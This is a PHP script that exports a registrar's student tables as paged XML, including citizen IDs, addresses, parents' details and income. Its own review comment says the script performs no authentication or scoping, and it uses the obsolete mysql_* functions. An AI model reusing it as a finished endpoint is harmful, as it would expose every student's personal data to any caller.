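<?php

/*
 * misGetData.php - exports registrar (eregis) tables as XML documents.
 *
 * Request parameters (GET):
 *   tb        which export to run: 0 = current academic year,
 *             1 = student master, 2 = student bio, 3 = student summary.
 *             Non-numeric values are treated as 0, which is also what the
 *             loose comparison in the previous version did.
 *   clg_code  college code copied into every <collegeCode> element. It is
 *             only echoed back; it does NOT filter the query - every row of
 *             the table is exported regardless of college.
 *   row       1-based page number for tb 1..3 (500 rows per page). Absent,
 *             0 or negative returns only the total row count.
 *
 * NOTE(review): nothing in this file authenticates the caller or scopes the
 * result set; tb 1..3 return personal data (citizen id, addresses, parents,
 * income) for every student. Access control has to be enforced before this
 * script runs (web-server auth, a session check inside eregis.inc, or a
 * network restriction) - confirm what the deployment relies on.
 *
 * eregis.inc, loaded from the include path configured below, defines the
 * connection settings $DBHOST, $DBUSER_EREGIS, $DBPASS_EREGIS and
 * $DBNAME_EREGIS.
 */

ini_set('include_path', '/var/www/sekret:.');
include_once("eregis.inc");

/* ---- helpers ---------------------------------------------------------- */

/**
 * Build the SQL LIMIT clause for a 1-based page number.
 *
 * Returns '' when $page is not positive; the callers treat that as
 * "count only". $page is cast to int first, so only a literal integer
 * ever reaches the query string.
 *
 * @param mixed $page     page number as received from the request
 * @param int   $pageSize rows per page
 * @return string 'LIMIT <offset> , <pageSize>' or ''
 */
function misLimitClause($page, $pageSize = 500)
{
    $page = (int) $page;
    if ($page <= 0) {
        return '';
    }
    $offset = $pageSize * $page - $pageSize;
    return "LIMIT $offset , $pageSize";
}

/**
 * Wrap a payload in the XML envelope every export uses.
 *
 * @param string $root root element name (acadyear, studentmaster, ...)
 * @param mixed  $nrow value of the nrow attribute
 * @param string $body already-escaped inner XML, or the bare count
 * @return string complete XML document
 */
function misXmlDocument($root, $nrow, $body)
{
    $xml = '<?xml version="1.0" encoding="UTF-8" ?>';
    $xml .= "<$root nrow=\"$nrow\" >$body</$root>";
    return $xml;
}

/**
 * Render one result row as a <std> element.
 *
 * $fields maps output tag => column name on $obj, in output order. A null
 * column name emits whatever chk('') yields (used for fields this export has
 * no source for, e.g. studentPassword). <collegeCode> always comes first.
 *
 * @param object $obj         row from mysql_fetch_object()
 * @param array  $fields      tag => column|null
 * @param mixed  $collegeCode value of the clg_code request parameter
 * @return string one <std>...</std> element
 */
function misRowXml($obj, array $fields, $collegeCode)
{
    $xml = '<std>';
    $xml .= '<collegeCode>' . chk($collegeCode) . '</collegeCode>';
    foreach ($fields as $tag => $column) {
        $value = ($column === null) ? '' : $obj->$column;
        $xml .= "<$tag>" . chk($value) . "</$tag>";
    }
    $xml .= '</std>';
    return $xml;
}

/**
 * Execute one export query and return the XML document for it.
 *
 * With $page <= 0 the query (which the caller built without a LIMIT) is
 * run only to report its row count; otherwise every fetched row is
 * rendered through misRowXml(). A failed query yields an empty document
 * instead of the warning cascade mysql_num_rows()/mysql_fetch_object()
 * would raise on a non-resource.
 *
 * @param resource $link        open MySQL connection
 * @param string   $sql         SELECT to run (LIMIT already applied)
 * @param string   $root        root element name
 * @param array    $fields      tag => column map for misRowXml()
 * @param int      $page        requested page, <= 0 for count mode
 * @param mixed    $collegeCode value echoed into each row
 * @return string XML document
 */
function misExport($link, $sql, $root, array $fields, $page, $collegeCode)
{
    $result = mysql_query($sql, $link);
    if ($result === false) {
        return misXmlDocument($root, 0, ((int) $page > 0) ? '' : 0);
    }
    if ((int) $page <= 0) {
        $numrow = mysql_num_rows($result);
        return misXmlDocument($root, $numrow, $numrow);
    }
    $body = '';
    $count = 0;
    while ($obj = mysql_fetch_object($result)) {
        $count++;
        $body .= misRowXml($obj, $fields, $collegeCode);
    }
    return misXmlDocument($root, $count, $body);
}

/* ---- connect ---------------------------------------------------------- */

$link = mysql_connect($DBHOST, $DBUSER_EREGIS, $DBPASS_EREGIS);
if ($link === false || !mysql_select_db($DBNAME_EREGIS, $link)) {
    // No usable connection: emit nothing rather than PHP warnings that would
    // put host and database names into the HTTP response.
    exit;
}
mysql_query("SET NAMES UTF8", $link);

/* ---- dispatch --------------------------------------------------------- */

if (isset($_GET['tb']) && isset($_GET['clg_code'])) {
    // Cast once so the comparisons below are exact and only integers are
    // ever interpolated into SQL. A negative or missing row means "count".
    $table       = (int) $_GET['tb'];
    $row         = isset($_GET['row']) ? (int) $_GET['row'] : 0;
    $collegeCode = $_GET['clg_code'];
    $limit       = misLimitClause($row);

    if ($table === 0) {
        // Academic year of the term configuration that covers today's date
        // (server time zone - confirm it matches the registrar's).
        $sql = "SELECT * FROM rg_TermConfig WHERE '" . date('Y-m-d') . "' BETWEEN tmcFrDate AND tmcToDate";
        $result = mysql_query($sql, $link);
        $term = ($result !== false) ? mysql_fetch_object($result) : false;
        $acadYear = ($term !== false)
            ? htmlspecialchars((string) $term->tmcAcY, ENT_QUOTES, 'UTF-8')
            : '';
        // The nrow attribute was always empty here (the previous version
        // interpolated an undefined variable); kept empty for compatibility.
        echo '<?xml version="1.0" encoding="UTF-8" ?>' . "<acadyear nrow=\"\">$acadYear</acadyear>";

    } elseif ($table === 1) {
        // Output tag => column of the joined student master row, in the
        // order the consumer expects. null = no source column.
        $fields = array(
            'studentId'          => 'stdId',
            'studentCode'        => 'stdCode',
            'levelId'            => 'sehElvId',
            'programId'          => 'stdCurId',
            'prefixId'           => 'stdPfId',
            'studentName'        => 'stdName',
            'studentSurname'     => 'stdSurname',
            'studentNameEng'     => 'stdNameE',
            'studentSurnameEng'  => 'stdSurnameE',
            'creditAttempt'      => 'stdCreditAttempt',
            'creditSatisfy'      => 'stdCreditSatisfy',
            'GPA'                => 'stdGPA',
            'admitAcadYear'      => 'stdAdY',
            'admitSemester'      => 'stdTmIdAdmit',
            'admitDate'          => 'admitDate',
            'finishDate'         => 'finishDate',
            'studentPassword'    => null,
            'studentEmail'       => 'sdtEmail',
            'studentYear'        => 'stdSyId',
            'studentStatus'      => 'stdSstId',
            'officerId1'         => 'advPrsId',
            'officerId2'         => null,
            'financeStatus'      => 'stdFsId',
            'updateUserId'       => 'stdUpdateUsLogin',
            'updateDateTime'     => 'stdUpdateDate',
            'citizenId'          => 'sdtCitizenId',
            'graduateYear'       => 'stdGraduateY',
            'genStatus'          => 'stdGenStatus',
            'genNo'              => 'stdGenId',
            'entryTypeId'        => 'stdEtId',
            'entryTypeId2'       => 'stdEt2Id',
            'studentSex'         => 'sdtSex',
            'scholarId'          => 'stdSoId',
            'preAdmitPositionId' => 'stdPaId',
            'totalPoint'         => 'stdTotalPoint',
            'honor'              => 'stdHonor',
            'medal'              => 'stdMedal',
            'exitExam'           => 'stdExitExam',
            'studentStatusTmp'   => 'stdSstIdTmp',
        );
        // The +543 on the year presumably converts to the Thai Buddhist Era;
        // the dates are emitted as YYYY-M-D without zero padding.
        $sql = "SELECT * ,
            CONCAT(YEAR(stdAdmitDate)+543,'-',MONTH(stdAdmitDate),'-',DAY(stdAdmitDate)) AS admitDate ,
            CONCAT(YEAR(stdGraduateDate)+543,'-',MONTH(stdGraduateDate),'-',DAY(stdGraduateDate)) AS finishDate 
            FROM rg_Student 
            LEFT JOIN rg_StudentDetails ON sdtStdId = stdId
            LEFT JOIN rg_StudentEduHis ON sehStdId = stdId
            LEFT JOIN rg_Adviser ON advStdId = stdId AND advSyId = stdSyId
            WHERE 1=1 GROUP BY stdId $limit ";
        echo misExport($link, $sql, 'studentmaster', $fields, $row, $collegeCode);

    } elseif ($table === 2) {
        $fields = array(
            'studentId'          => 'sdtStdId',
            'nationId'           => 'sdtNtId',
            'religionId'         => 'sdtRlgId',
            'bloodGroup'         => 'sdtBloodGroup',
            'birthDate'          => 'birthDate',
            'birthProvinceId'    => 'sdtPrvIdBirth',
            'homeAddress'        => 'sdtHomeAddr',
            'homeDistrictId'     => 'sdtDtIdHome',
            'homeAmphurId'       => 'sdtApIdHome',
            'homeProvinceId'     => 'sdtPrvIdHome',
            'homeZipcode'        => 'sdtHomePostCode',
            'homePhoneNo'        => 'sdtHomePhoneNo',
            'officeName'         => 'sdtWorkName',
            'officeAddress'      => 'sdtWorkAddr',
            'officeDistrictId'   => 'sdtDtIdWork',
            'officeAmphurId'     => 'sdtApIdWork',
            'officeProvinceId'   => 'sdtPrvIdWork',
            'officeZipcode'      => 'sdtWorkPostCode',
            'officePhoneNo'      => 'sdtWorkPhoneNo',
            'workingStatus'      => 'sdtWorkStatus',
            'workingPosition'    => 'sdtWorkPosition',
            'workingSalary'      => 'sdtWorkSalary',
            'fatherName'         => 'sdtFatherName',
            'fatherAddress'      => 'sdtFatherAddr',
            'fatherDistrictId'   => 'sdtDtIdFather',
            'fatherAmphurId'     => 'sdtApIdFather',
            'fatherProvinceId'   => 'sdtPrvIdFather',
            'fatherZipcode'      => 'sdtFatherPostCode',
            'fatherPhoneNo'      => 'sdtFatherPhoneNo',
            'fatherOccupation'   => 'sdtFatherOccupation',
            'fatherStatus'       => 'sdtFatherStatus',
            'motherName'         => 'sdtMotherName',
            'motherAddress'      => 'sdtMotherAddr',
            'motherDistrictId'   => 'sdtDtIdMother',
            'motherAmphurId'     => 'sdtApIdMother',
            'motherProvinceId'   => 'sdtPrvIdMother',
            'motherZipcode'      => 'sdtMotherPostCode',
            'motherPhoneNo'      => 'sdtMotherPhoneNo',
            'motherOccupation'   => 'sdtMotherOccupation',
            'motherStatus'       => 'sdtMotherStatus',
            'studentSex'         => 'sdtSex',
            'parentName'         => 'sdtParentName',
            'parentRelation'     => 'sdtParentRelationship',
            'parentAddress'      => 'sdtParentAddr',
            'parentDistrictId'   => 'sdtDtIdParent',
            'parentAmphurId'     => 'sdtApIdParent',
            'parentProvinceId'   => 'sdtPrvIdParent',
            'parentZipcode'      => 'sdtParentPostCode',
            'parentPhoneNo'      => 'sdtParentPhoneNo',
            'parentMobile'       => 'sdtParentMobileNo',
            'parentOcc'          => 'sdtParentOccupation',
            'parentIncome'       => 'sdtParentIncome',
            'parentEmail'        => 'sdtParentEmail',
            'contactPerson'      => 'sdtContactName',
            'contactAddress'     => 'sdtContactAddr',
            'contactDistrictId'  => 'sdtDtIdContact',
            'contactAmphurId'    => 'sdtApIdContact',
            'contactProvinceId'  => 'sdtPrvIdContact',
            'contactZipcode'     => 'sdtContactPostCode',
            'contactPhoneNo'     => 'sdtContactPhoneNo',
            'cardExpiryDate'     => 'sdtCardExpireDate',
            'currentAddress'     => 'sdtCurrentAddr',
            'currentDistrictId'  => 'sdtDtIdCurrent',
            'currentAmphurId'    => 'sdtApIdCurrent',
            'currentProvinceId'  => 'sdtPrvIdCurrent',
            'currentZipcode'     => 'sdtCurrentPostCode',
            'currentPhoneNo'     => 'sdtCurrentPhoneNo',
            'graduateAddress'    => 'sdtGraduateAddr',
            'graduateDistrictId' => 'sdtDtIdGraduate',
            'graduateAmphurId'   => 'sdtApIdGraduate',
            'graduateProvinceId' => 'sdtPrvIdGraduate',
            'graduateZipcode'    => 'sdtGraduatePostCode',
            'graduatePhoneNo'    => 'sdtGraduatePhoneNo',
            'maritalStatusId'    => 'sdtMsId',
            'weight'             => 'sdtWeight',
            'height'             => 'sdtHeight',
            'picturePath'        => 'sdtPicturePath',
            'recruitmentTypeId'  => 'sdtRtId',
            'occExamResult'      => 'sdtOccExamResult',
            'canRefund'          => 'sdtCanRefund',
            'oldStudentName'     => 'sdtOldName',
            'entryDegree'        => 'sdtEdgIdPre',
            // The previous version emitted a stray backtick before
            // </healthPrivId>, producing malformed XML for every row.
            'healthPrivId'       => 'sdtHpId',
        );
        $sql = "SELECT * 
            ,CONCAT(YEAR(sdtBirthDate)+543,'-',MONTH(sdtBirthDate),'-',DAY(sdtBirthDate)) AS birthDate 
            FROM rg_StudentDetails 
            LEFT JOIN rg_Student ON sdtStdId = stdId
            WHERE 1=1 $limit ";
        echo misExport($link, $sql, 'studentbio', $fields, $row, $collegeCode);

    } elseif ($table === 3) {
        $fields = array(
            'studentId'        => 'ssmStdId',
            'acadYear'         => 'ssmAcY',
            'semester'         => 'ssmTmId',
            'studentStatus'    => 'ssmSstId',
            'GPA'              => 'ssmGPA',
            'creditAttempt'    => 'ssmCreditAttempt',
            'creditSatisfy'    => 'ssmCreditSatisfy',
            'creditPoint'      => 'ssmCreditPoint',
            'GPAX'             => 'ssmGPAX',
            'sumCreditAttempt' => 'ssmSumCreditAttempt',
            'sumCreditSatisfy' => 'ssmSumCreditSatisfy',
            'sumCreditPoint'   => 'ssmSumCreditPoint',
            'createDateTime'   => 'ssmCreateDate',
            'createUserId'     => 'ssmCreateUserId',
            'updateDateTime'   => 'ssmUpdateDate',
            'updateUserId'     => 'ssmUpdateUserId',
            'approveSpe'       => 'ssmSstIdApproveSpe',
            'approver'         => 'ssmApprover',
            'refNo'            => 'ssmRefNo',
            'approveDate'      => 'ssmApproveDate',
            'passStatus'       => 'ssmPassStatus',
            'syId'             => 'ssmSyId',
        );
        $sql = "SELECT * FROM rg_StudentSummary 
            WHERE 1=1 $limit ";
        echo misExport($link, $sql, 'studentstatus', $fields, $row, $collegeCode);
    }
    // Any other tb value produces no output, as before.
}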

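/**
 * Escape a column value for use as XML element text.
 *
 * Empty values (NULL columns, '' and anything that stringifies to '') are
 * emitted as the literal string NULL, which is what the export's consumers
 * receive today; everything else is escaped with ENT_QUOTES so quotes and
 * angle brackets cannot break the enclosing element. Comparing the string
 * form avoids the loose `!= ''` test, under which an integer 0 would also
 * have been reported as NULL on older PHP.
 *
 * @param mixed $field raw column value from mysql_fetch_object()
 * @return string escaped text, or 'NULL' for empty input
 */
function chk($field)
{
    $text = (string) $field;
    if ($text === '') {
        return 'NULL';
    }
    // Explicit UTF-8 to match the encoding the XML declaration promises
    // (and SET NAMES UTF8 on the connection) regardless of PHP's default.
    return htmlspecialchars($text, ENT_QUOTES, 'UTF-8');
}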
?>
